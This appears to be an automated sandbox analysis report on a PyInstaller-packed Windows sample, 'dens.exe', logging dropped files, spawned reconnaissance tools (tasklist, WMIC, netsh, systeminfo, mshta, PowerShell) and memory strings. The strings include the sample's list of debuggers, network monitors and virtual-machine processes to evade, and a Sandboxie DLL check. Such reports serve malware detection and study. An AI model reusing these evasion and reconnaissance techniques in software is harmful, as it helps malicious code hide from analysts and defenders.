            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\_queue.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\_asyncio.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\pyexpat.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\_multiprocessing.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\wheel-0.43.0.dist-info\LICENSE.txtJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\wheel-0.43.0.dist-info\LICENSE.txtJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query type= service state= all
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C0F76C0 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,0_2_00007FF62C0F76C0
            Source: C:\Users\user\Desktop\dens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Caption, Description, ProviderName FROM Win32_LogicalDisk
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Caption, Command FROM Win32_StartupCommand
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "FIDDLER.EXE"P
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: *DXENSERVICE.EXE0
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: QEMU-GA.EXE
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "QEMU-GA.EXE"
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "QEMU-GA.EXE"P
            Source: dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELF.BANNED_PROCESS = ["HTTP TOOLKIT.EXE", "HTTPDEBUGGERUI.EXE","WIRESHARK.EXE", "FIDDLER.EXE", "REGEDIT.EXE", "TASKMGR.EXE", "VBOXSERVICE.EXE", "DF5SERV.EXE", "PROCESSHACKER.EXE", "VBOXTRAY.EXE", "VMTOOLSD.EXE", "VMWARETRAY.EXE", "IDA64.EXE", "OLLYDBG.EXE",
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "SBIEDLL.DLL"
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "VMUSRVC.EXE"
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: DVMUSRVC.EXE
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 'DPROCESSHACKER.EXE
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "XENSERVICE.EXE"
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: *DXENSERVICE.EXE
            Source: dens.exe, 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2033261544.000002D9AC179000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "XENSERVICE.EXE", # XEN
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: DSBIEDLL.DLL
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: DFIDDLER.EXE0
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: DQEMU-GA.EXEP
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: DWIRESHARK.EXE
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXE
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMUSRVC.EXE
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "WIRESHARK.EXE"
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "PROCESSHACKER.EXE"
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: DOLLYDBG.EXE
            Source: dens.exe, 00000001.00000003.1954169257.000002D9AC3C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "DF5SERV.EXE", "PROCESSHACKER.EXE", "VBOXTRAY.EXE", "VMTOOLSD.EXE", "VMWARETRAY.EXE", "IDA64.EXE", "OLLYDBG.EXE",
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "OLLYDBG.EXE"
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "FIDDLER.EXE"
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: XENSERVICE.EXE
            Source: dens.exe, 00000001.00000003.1772883134.000002D9AB3F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\SYSTEM32\SBIEDLL.DLLP\_MEI62482\SBIEDLL.DLL
            Source: dens.exe, 00000001.00000003.2030100732.000002D9AC3C2000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1775186095.000002D9AC3C3000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2034026381.000002D9AC3C3000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1954169257.000002D9AC3C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "FIDDLER.EXE",
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "WIRESHARK.EXE"
            Source: dens.exe, 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1783070234.000002D9AC1C5000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776400001.000002D9AC1C1000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2032462700.000002D9AC1BB000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2034615706.000002D9AC1D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HANDLE = CTYPES.WINDLL.LOADLIBRARY("SBIEDLL.DLL")
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
